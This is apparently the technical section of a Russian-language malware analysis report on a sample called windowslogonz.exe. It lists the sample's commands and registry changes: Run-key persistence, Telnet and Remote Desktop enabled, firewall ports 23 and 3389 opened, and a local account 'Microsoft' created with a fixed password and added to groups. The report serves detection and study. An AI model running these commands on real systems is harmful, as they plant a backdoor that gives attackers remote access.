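Техническая информация
Кратко: приведённые ниже записи описывают автозапуск через ключ Run, включение служб Telnet (TlntSvr) и удалённого рабочего стола (TermService), открытие в брандмауэре портов TCP 23 и TCP 3389, а также создание локальной учётной записи «Microsoft» и добавление её в группы.
Примечание: строки приведены без исправлений. Опечатки в командах («TelcnetClients», «conrtol») сохранены как есть и сами могут служить характерными признаками при поиске следов. Запись «%USERNAME%s», по-видимому, является артефактом автоматической подстановки имени пользователя в отчёте (вероятно, исходное имя группы — «Administrators»); это предположение требует проверки.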
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Boot Start' = '<SYSTEM32>\windowslogonz.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\net1.exe localgroup TelcnetClients /add Microsoft
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\net1.exe localgroup %USERNAME%s Microsoft /add
- <SYSTEM32>\net1.exe localgroup TelcnetClients /add
- <SYSTEM32>\net1.exe start tlntsvr
- <SYSTEM32>\reg.exe add "hklm\system\currentcontrolset\conrtol\Lsa" /v "forceguest" /t REG_DWORD /d 0x0 /f
- <SYSTEM32>\netsh.exe firewall add portopening TCP 23 "Telnet"
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\windowslogonz.bat" <Текущая директория>\"
- <SYSTEM32>\reg.exe import 1.reg
- <SYSTEM32>\sc.exe config TermService start=auto
- <SYSTEM32>\net1.exe user %USERNAME% /active:yes
- <SYSTEM32>\net1.exe user Microsoft 001949 /add
- <SYSTEM32>\net1.exe start Termservice
- <SYSTEM32>\netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
- %TEMP%\1.tmp\1.reg
- %TEMP%\1.tmp\windowslogonz.bat
- %TEMP%\1.tmp\windowslogonz.bat
- ClassName: 'Indicator' WindowName: ''